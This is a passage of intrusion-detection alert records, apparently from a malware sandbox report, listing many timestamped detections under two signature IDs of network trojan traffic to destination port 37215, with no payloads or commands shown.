            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543158
            SID:2835222
            Source Port:49998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869842
            SID:2835222
            Source Port:41998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605723
            SID:2835222
            Source Port:36848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.611401
            SID:2835222
            Source Port:35396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039637
            SID:2835222
            Source Port:48948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773750
            SID:2829579
            Source Port:49878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.851287
            SID:2829579
            Source Port:50842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303617
            SID:2829579
            Source Port:49728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780020
            SID:2829579
            Source Port:59672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644104
            SID:2829579
            Source Port:44950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.159113
            SID:2829579
            Source Port:52492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927221
            SID:2835222
            Source Port:47748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788955
            SID:2835222
            Source Port:39214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.299991
            SID:2835222
            Source Port:35720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.573911
            SID:2829579
            Source Port:52806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741882
            SID:2829579
            Source Port:50974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841969
            SID:2835222
            Source Port:41568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875710
            SID:2835222
            Source Port:54634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280531
            SID:2829579
            Source Port:54654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047484
            SID:2829579
            Source Port:49170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525846
            SID:2835222
            Source Port:48466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748315
            SID:2835222
            Source Port:39492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880763
            SID:2829579
            Source Port:45788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.498365
            SID:2835222
            Source Port:53992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818242
            SID:2835222
            Source Port:53732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071348
            SID:2835222
            Source Port:56764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955799
            SID:2829579
            Source Port:53596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005604
            SID:2829579
            Source Port:55028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778364
            SID:2829579
            Source Port:57714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020987
            SID:2829579
            Source Port:58110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304173
            SID:2829579
            Source Port:57300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.190242
            SID:2829579
            Source Port:34838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761229
            SID:2829579
            Source Port:48530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885020
            SID:2829579
            Source Port:32822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.927130
            SID:2835222
            Source Port:54114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045465
            SID:2835222
            Source Port:40758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782094
            SID:2835222
            Source Port:40846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789635
            SID:2829579
            Source Port:50048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857917
            SID:2835222
            Source Port:40676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052269
            SID:2829579
            Source Port:39680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.041864
            SID:2829579
            Source Port:37556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071049
            SID:2835222
            Source Port:46132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368466
            SID:2835222
            Source Port:50218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507441
            SID:2835222
            Source Port:54332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459743
            SID:2829579
            Source Port:41696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433012
            SID:2835222
            Source Port:54670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920140
            SID:2835222
            Source Port:37932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778630
            SID:2835222
            Source Port:34258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988562
            SID:2835222
            Source Port:59852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575419
            SID:2835222
            Source Port:32830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986101
            SID:2829579
            Source Port:56204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997776
            SID:2829579
            Source Port:51430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881939
            SID:2835222
            Source Port:57048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473210
            SID:2829579
            Source Port:37166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542539
            SID:2829579
            Source Port:33566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931043
            SID:2835222
            Source Port:59194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715373
            SID:2835222
            Source Port:51918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918900
            SID:2829579
            Source Port:60192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.768004
            SID:2829579
            Source Port:59542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048066
            SID:2829579
            Source Port:50328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.759976
            SID:2835222
            Source Port:43404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869367
            SID:2829579
            Source Port:44350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400306
            SID:2829579
            Source Port:60952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778235
            SID:2835222
            Source Port:35254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450559
            SID:2829579
            Source Port:36292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767215
            SID:2835222
            Source Port:55870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963238
            SID:2829579
            Source Port:39036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.494173
            SID:2835222
            Source Port:42816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563410
            SID:2829579
            Source Port:51098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.490984
            SID:2835222
            Source Port:42524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818507
            SID:2835222
            Source Port:55452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.087047
            SID:2829579
            Source Port:40154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713419
            SID:2829579
            Source Port:60798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421351
            SID:2835222
            Source Port:40246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810404
            SID:2829579
            Source Port:33324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933087
            SID:2835222
            Source Port:50398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.372623
            SID:2835222
            Source Port:47770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003084
            SID:2829579
            Source Port:44092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.834913
            SID:2829579
            Source Port:51872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866721
            SID:2835222
            Source Port:46044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840105
            SID:2835222
            Source Port:49022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639943
            SID:2829579
            Source Port:41564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618160
            SID:2829579
            Source Port:35828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994005
            SID:2835222
            Source Port:56340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.951730
            SID:2829579
            Source Port:46454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887275
            SID:2829579
            Source Port:56994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.719548
            SID:2835222
            Source Port:34574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779015
            SID:2829579
            Source Port:43694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.930904
            SID:2835222
            Source Port:39066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544205
            SID:2835222
            Source Port:55638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864855
            SID:2835222
            Source Port:58454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.988405
            SID:2829579
            Source Port:35952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152876
            SID:2835222
            Source Port:36504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714631
            SID:2835222
            Source Port:37882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701967
            SID:2829579
            Source Port:48510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.631849
            SID:2835222
            Source Port:54770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824266
            SID:2829579
            Source Port:40608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824650
            SID:2829579
            Source Port:47166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039067
            SID:2835222
            Source Port:41210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903093
            SID:2835222
            Source Port:47120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.115869
            SID:2829579
            Source Port:40880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.910994
            SID:2829579
            Source Port:41374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057423
            SID:2835222
            Source Port:57550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676513
            SID:2829579
            Source Port:47128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809105
            SID:2835222
            Source Port:34260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969472
            SID:2829579
            Source Port:46290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881120
            SID:2829579
            Source Port:35334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.458360
            SID:2835222
            Source Port:46020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446766
            SID:2829579
            Source Port:59824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764933
            SID:2829579
            Source Port:50172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303688
            SID:2835222
            Source Port:38476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769022
            SID:2829579
            Source Port:34800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864716
            SID:2835222
            Source Port:34648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.536651
            SID:2835222
            Source Port:47874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916806
            SID:2835222
            Source Port:45908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.062691
            SID:2835222
            Source Port:42282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290570
            SID:2835222
            Source Port:59230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805071
            SID:2835222
            Source Port:55398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500187
            SID:2835222
            Source Port:41678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506676
            SID:2835222
            Source Port:53958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699219
            SID:2835222
            Source Port:51620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753168
            SID:2835222
            Source Port:36086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999315
            SID:2829579
            Source Port:52158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298410
            SID:2835222
            Source Port:36320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.523748
            SID:2835222
            Source Port:45062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696329
            SID:2835222
            Source Port:34574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298585
            SID:2835222
            Source Port:41480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279517
            SID:2829579
            Source Port:60636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968018
            SID:2835222
            Source Port:55690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745224
            SID:2829579
            Source Port:49520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.468405
            SID:2829579
            Source Port:34734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804644
            SID:2835222
            Source Port:57082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.833551
            SID:2835222
            Source Port:51312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062960
            SID:2829579
            Source Port:56538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061435
            SID:2829579
            Source Port:38172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743266
            SID:2835222
            Source Port:32974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.544608
            SID:2835222
            Source Port:53518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435751
            SID:2829579
            Source Port:42600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756109
            SID:2829579
            Source Port:55638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780036
            SID:2829579
            Source Port:53884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.010203
            SID:2829579
            Source Port:57822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261363
            SID:2835222
            Source Port:54972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.063558
            SID:2829579
            Source Port:52762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848874
            SID:2829579
            Source Port:38356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563357
            SID:2829579
            Source Port:36988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899622
            SID:2829579
            Source Port:51816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765246
            SID:2835222
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809829
            SID:2835222
            Source Port:59458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862931
            SID:2835222
            Source Port:37458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.316221
            SID:2835222
            Source Port:59322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050870
            SID:2829579
            Source Port:50988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778398
            SID:2829579
            Source Port:36706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295954
            SID:2829579
            Source Port:38828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.216658
            SID:2835222
            Source Port:43728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866696
            SID:2829579
            Source Port:39442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330614
            SID:2835222
            Source Port:57410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803731
            SID:2829579
            Source Port:33790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915272
            SID:2829579
            Source Port:49384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.413932
            SID:2835222
            Source Port:33992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880290
            SID:2829579
            Source Port:43690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.916086
            SID:2829579
            Source Port:38542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824775
            SID:2829579
            Source Port:56970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900558
            SID:2829579
            Source Port:48880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925755
            SID:2829579
            Source Port:55602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299245
            SID:2835222
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065497
            SID:2835222
            Source Port:45062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290079
            SID:2835222
            Source Port:56896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777715
            SID:2829579
            Source Port:57992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486865
            SID:2835222
            Source Port:60872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828197
            SID:2829579
            Source Port:46726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732888
            SID:2835222
            Source Port:48942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277059
            SID:2829579
            Source Port:47770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756565
            SID:2835222
            Source Port:57146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847741
            SID:2829579
            Source Port:37288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.055186
            SID:2835222
            Source Port:38850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.571960
            SID:2835222
            Source Port:34150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379891
            SID:2829579
            Source Port:36128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721357
            SID:2835222
            Source Port:56886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507714
            SID:2835222
            Source Port:41640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723826
            SID:2829579
            Source Port:38166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972790
            SID:2829579
            Source Port:45812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782663
            SID:2835222
            Source Port:58378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298554
            SID:2835222
            Source Port:44006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.392728
            SID:2835222
            Source Port:45194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864349
            SID:2829579
            Source Port:54630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084545
            SID:2835222
            Source Port:59778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936887
            SID:2829579
            Source Port:38880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.910429
            SID:2835222
            Source Port:35224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860620
            SID:2829579
            Source Port:57976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058503
            SID:2829579
            Source Port:36894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597238
            SID:2829579
            Source Port:53060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432147
            SID:2835222
            Source Port:45498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.454285
            SID:2835222
            Source Port:35854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805544
            SID:2829579
            Source Port:57840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379637
            SID:2835222
            Source Port:48416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723753
            SID:2829579
            Source Port:39708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741882
            SID:2835222
            Source Port:46696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
